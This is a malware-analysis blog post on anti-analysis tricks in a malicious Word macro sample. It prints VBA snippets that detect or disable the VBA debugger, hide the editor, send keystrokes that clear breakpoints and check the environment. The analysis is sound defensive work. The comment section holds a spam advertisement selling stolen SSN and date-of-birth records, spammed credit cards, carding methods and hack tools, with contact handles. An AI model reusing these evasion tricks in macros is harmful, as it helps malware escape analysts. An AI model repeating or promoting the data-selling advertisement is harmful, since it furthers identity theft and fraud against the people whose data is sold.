Word Document : Anti Analysis Tricks

This post will cover Anti Analysis trick that can be used in Microsoft Office Word Document.
Sample used for analysis -
hxxps://virustotal.com/en/file/d49b2f735d5d4334653d705cb0ff837af88a4981253fb68c6d927745d97a1b3f/analysis/

1.Checking Length of Name of Word Document
Generally in malware analysis field we save document with its name as md5(32 characters) or sha256 (64 characters).
// if name length is greater than 16 characters
if Me.Name > 16  Then 
//CallByName "Microsoft Word", "Run",1,FluffyClouds
CallByName Application, ThisDocument.Variables.Item("RegisterProduct"), VbMethod, Application.Documents.Item(1).Variables.Item("UserLookup").Value
//Delete Document Items and Save Document
Do
    ' Fix Later - Jose - 3/2017
    DoEvents
    i = 1
    ActiveDocument.Variables.Item(i).Delete
    i = i + 1
Loop Until ActiveDocument.Variables.Count > 0

ActiveDocument.Save

In this case document run vbMethod FluffyClouds which prints "Game over - Good Bye".It deletes all the Items and save the document.

2.Detect Debugger (Microsoft Visual Basic For Applications)
This trick is similar to FindWindow API which is used to detect presence of debugger.
//Tasks("Microsoft Visual Basic For Applications").Visible
Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible

3.Time Difference
compare time difference between two values of Timer function of Visual Basic for Applications (VBA). This is similar to rdtsc trick used in executable.

//if difference between number of seconds elapsed since midnight is greater than 0.
If (T2 - CallTimer) > vbNormal Then
' Configure User Corp Account For Data Add In
//run "FluffyClouds" method
CallByName Application, A1.Item("RegisterProduct"), VbMethod, A1.Item("UserLookup").Value 
Else
CallTimer = Timer

4.Schedule Job
Run function HostSync after 10 seconds. Send WM_CLOSE and WM_DESTROY window message to Microsoft Visual Basic For Application (VBA window) using Task("Microsoft Visual Basic For Application").SendWindowMessage API.
//schedule task to run procedure "HostSync" after this much (Now + TimeValue("00:00:10")) time elapsed i.e after 10 seconds.
Application.OnTime Now + TimeValue("00:00:10"), "HostSync"

Sub HostSync()
//CallByName Application.WordBasic,"AppSendMessage",1,"Microsoft Visual Basic For Applications",16,1,0
//send WM_CLOSE window message to Microsoft Visual Basic For Application (VBA window) using Task("Microsoft Visual Basic For Applications").SendWindowMessage API
' Call Home Folder Sync Settings
CallByName Application.WordBasic, ActiveDocument.Variables("InvoiceNumber"), VbMethod, ActiveDocument.Variables("DailyTaskLog").Value, &H10, 1, 0

//CallByName Application.WordBasic,"AppSendMessage",1,"Microsoft Visual Basic For Applications",2,1,0
//send WM_DESTROY window message to Microsoft Visual Basic For Application (VBA window) using Task("Microsoft Visual Basic For Applications").SendWindowMessage API
' Synchronize Outlook Folders For Invoicing - 2/2016
CallByName Application.WordBasic, ActiveDocument.Variables("InvoiceNumber"), VbMethod, ActiveDocument.Variables("DailyTaskLog").Value, &H2, 1, 0
End Sub

5.Infinite Loop

If Microsoft Visual Basic For Applications(VBA) is active set its visible property to false.
//It is an infinite loop by setting visible property of microsoft visual basic editor to false.
Do
DoEvents
//Task("Microsoft Visual Basic For Applications").Visible = False
Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible = False
//Loop Until Tasks("Microsoft Visual Basic For Applications").Visible = False
Loop Until Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible = False

6.Application Info : Active Window Size and Word Version

Using instruction WordBasic.AppInfo(7) = Application.UsableHeight (Maximum height of the space that a window can occupy in the application window area)
Comparing version of Microsoft Office Word WordBasic.AppInfo(2) = WordBasic.Version

//AppInfo(7) = Application.UsableHeight
If Application.WordBasic.AppInfo(7) > 1000 Then
//AppInfo(2) = Application.Version >= 14
If CInt(Application.WordBasic.AppInfo(2)) >= (vbDirectory - vbHidden) Then

7. SendKeys Method
If Microsoft Visual Basic For Applications (VBA) is active/visible.Use Sendkeys method to send keystrokes with Wait parameter value set to true which means Application wait for the keys to be processed before returning control to the macro.
Few keystrokes values and their meaning.
"%{F11}" = ALT + F11 = Open Word Document.
"^+{F9}" = {CTRL + SHIFT + F9} = Clear All Breakpoints

//Tasks("Microsoft Visual Basic For Applications").Visible    
If Tasks(ActiveDocument.Variables("DailyTaskLog")).Visible Then
//CallByName Application.WordBasic, Sendkeys,1,"^+{F9}",True  
//Send key strokes "^+{F9}" = {CTRL + SHIFT + F9} = Clear All Breakpoints.
//True = Process key strokes before control is return to procedure.
CallByName Application.WordBasic, ActiveDocument.Variables("SalesPipeline").Value, VbMethod, ActiveDocument.Variables("CallLeads").Value, True

8.Directory Count
Get Directory count of path denoted by environment variable %ProgramFiles% .If  count is less than specified value terminate debugging.
//EmployeeCount=CallByName(Application.WordBasic,Environ$,VbGet,"%ProgramFiles%")
//"C:\Program Files (x86)" Directory Path
EmployeeCount = CallByName(Application.WordBasic,ActiveDocument.Variables("EmployeeID"),VbGet, ActiveDocument.Variables("ManagerName").Value)

//If CallByName(Application.WordBasic,"CountDirectories",VbMethod,%ProgramFiles%)
If CallByName(Application.WordBasic, ActiveDocument.Variables("GetMgmtName"), VbMethod, EmployeeCount) < 30 Then
//run "FluffyClouds" method
CallByName Application, ActiveDocument.Variables("RegisterProduct"), VbMethod, ActiveDocument.Variables("UserLookup")

9.Renaming Macro -  Crash Debugger (Microsoft Visual Basic For Applications)
//Application.OrganizerRename "AntiAn.doc","ThisDocument","Temp",3
//Rename macro "ThisDocument" to "Temp".
Application.OrganizerRename ActiveDocument.FullName, Application.WordBasic.macroname(1), "Temp", wdOrganizerObjectProjectItems

Comments

  1. Fullz/Pros/Leads

    SSN DOB
    SSN DOB DL
    High CS Fullz

    Fresh Spammed CC's
    MAny other leads & stuff

    Spamming, Hacking, Carding Stuff
    Legit stuff with Guarantee

    Loan methods/Carding methods
    All Hack Tools
    Tutorials
    Mailers
    Brutes

    & many more

    What's app +92 317 2721122
    Tele.gram @leadsupplier
    ICQ 752822040
    exploit.Tools4U AT GMAIL (DOT) COM

    ReplyDelete
  2. The tricks are very good. Besides facing the problem with a computer over and over can be the worst situation for us. ITFUX24 is offering the professional service with pc reparatur Frankfurt. The experts has 7+ years of experience in his field. Just make a call and enjoy your 15% discount form the first day.

    ReplyDelete

Post a Comment

Popular posts from this blog

VIrtual Machine Detection Techniques

Analyzing ATM Malwares

Debugging MBR : IDA Pro and Bochs Emulator

Samsung CTF : Chicken or Egg Reversing Challenge

Memory Forensics : Tracking Process Injection

FireEye FLARE CTF 2017 : PEWPEWBOAT Challenge 5

FireEye FLARE CTF 2017 : APK Challenge 8

Windows Registry Forensics

DoublePulsar Backdoor

Google CTF 2017 : Android RE Challenge